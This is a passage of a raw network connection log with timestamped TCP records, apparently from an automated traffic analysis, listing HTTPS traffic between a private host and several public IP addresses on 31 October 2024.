                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.520554066 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.520560980 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.520581961 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.520586967 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.520615101 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.520631075 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.522095919 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.522115946 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.522166967 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.522171974 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.522330046 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.523272038 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.523288012 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.523329973 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.523334980 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.523364067 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.523380995 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.525211096 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.525227070 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.525260925 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.525265932 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.525293112 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.525315046 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.637434006 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.637453079 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.637510061 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.637518883 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.637556076 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.637588024 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638026953 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638045073 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638096094 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638103962 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638190031 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638531923 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638549089 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638608932 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638613939 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.638808966 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.641947031 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.641963005 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642002106 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642007113 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642050982 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642509937 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642529964 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642592907 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642597914 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.642640114 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643157005 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643177032 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643219948 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643224955 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643251896 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643268108 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643678904 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643695116 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643735886 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643740892 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643764019 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.643812895 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.754445076 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.754466057 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.754524946 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.754532099 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.754822969 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755028963 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755045891 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755089045 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755095005 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755117893 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755141020 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755454063 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755470991 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755516052 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755521059 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755542994 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.755561113 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.756248951 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.756283998 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.756329060 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.756333113 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.756356955 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.756377935 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.769208908 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.769227982 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.769309044 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.769334078 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.769387007 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.784336090 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.784354925 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.784416914 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.784424067 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.784445047 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.784493923 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.812997103 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.813019037 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.813080072 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.813088894 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.813150883 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.827963114 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.828007936 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.828037977 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.828043938 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.828090906 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.828483105 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.828542948 CET44349784206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.828649044 CET49784443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.853830099 CET4434978913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.854269981 CET49789443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.854269981 CET4434978813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.854285002 CET4434978913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.854656935 CET49788443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.854696035 CET4434978813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.854939938 CET49789443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.854944944 CET4434978913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.855077028 CET49788443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.855083942 CET4434978813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.857587099 CET4434979013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.858108044 CET49790443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.858124971 CET4434979013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.858903885 CET49790443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.858910084 CET4434979013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.882388115 CET49677443192.168.2.920.189.173.11
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.895066977 CET4434979213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.895576954 CET49792443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.895603895 CET4434979213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.897331953 CET49792443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.897337914 CET4434979213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.903908014 CET4434979113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.904246092 CET49791443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.904259920 CET4434979113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.904752016 CET49791443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.904757023 CET4434979113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.926172972 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.926343918 CET49787443192.168.2.9184.28.90.27
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.927469015 CET49787443192.168.2.9184.28.90.27
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.927484989 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.927778959 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.935340881 CET49787443192.168.2.9184.28.90.27
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.983336926 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.984199047 CET4434978913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.984260082 CET4434978913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.984323978 CET49789443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.985193014 CET4434978813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.985301018 CET4434978813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.985373974 CET49788443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.985568047 CET4434979013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.985797882 CET4434979013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:58.985948086 CET49790443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.002813101 CET49789443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.002837896 CET4434978913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.002938032 CET49789443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.002944946 CET4434978913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.004450083 CET49788443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.004475117 CET4434978813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.004501104 CET49788443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.004508018 CET4434978813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.007005930 CET49790443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.007011890 CET4434979013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.007198095 CET49790443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.007201910 CET4434979013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.015882015 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.015918016 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.016011953 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.016766071 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.016794920 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.016851902 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.016865969 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.016879082 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.016927004 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.017138004 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.017154932 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.017241955 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.017254114 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.017406940 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.017421961 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.035439014 CET4434979213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.035507917 CET4434979213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.035587072 CET49792443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.035962105 CET49792443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.035975933 CET4434979213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.035985947 CET49792443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.035990953 CET4434979213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.036082029 CET4434979113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.036170006 CET4434979113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.036222935 CET49791443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.037341118 CET49791443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.037352085 CET4434979113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.037355900 CET49791443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.037359953 CET4434979113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.046979904 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.047010899 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.047161102 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.047164917 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.047195911 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.047332048 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.047333002 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.047359943 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.048691988 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.048707008 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.179238081 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.179306984 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.179373026 CET49787443192.168.2.9184.28.90.27
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.180080891 CET49787443192.168.2.9184.28.90.27
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.180098057 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.180114985 CET49787443192.168.2.9184.28.90.27
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.180120945 CET44349787184.28.90.27192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.371164083 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.371203899 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.371274948 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.372921944 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:11:59.372934103 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.676146030 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.676352978 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.676367044 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.676796913 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.677124977 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.677211046 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.677463055 CET49810443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.677488089 CET44349810206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.798998117 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.799603939 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.799629927 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.800113916 CET49806443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.800122023 CET4434980613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.801394939 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.801747084 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.801760912 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.802117109 CET49804443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.802122116 CET4434980413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.803867102 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.804374933 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.804394960 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.805052042 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.805196047 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.806324959 CET49807443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.806329966 CET4434980713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.806593895 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.806617975 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.807104111 CET49803443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.807109118 CET4434980313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.807713985 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.807743073 CET4434980213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.808156013 CET49802443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:00.808170080 CET4434980213.107.246.45192.168.2.9
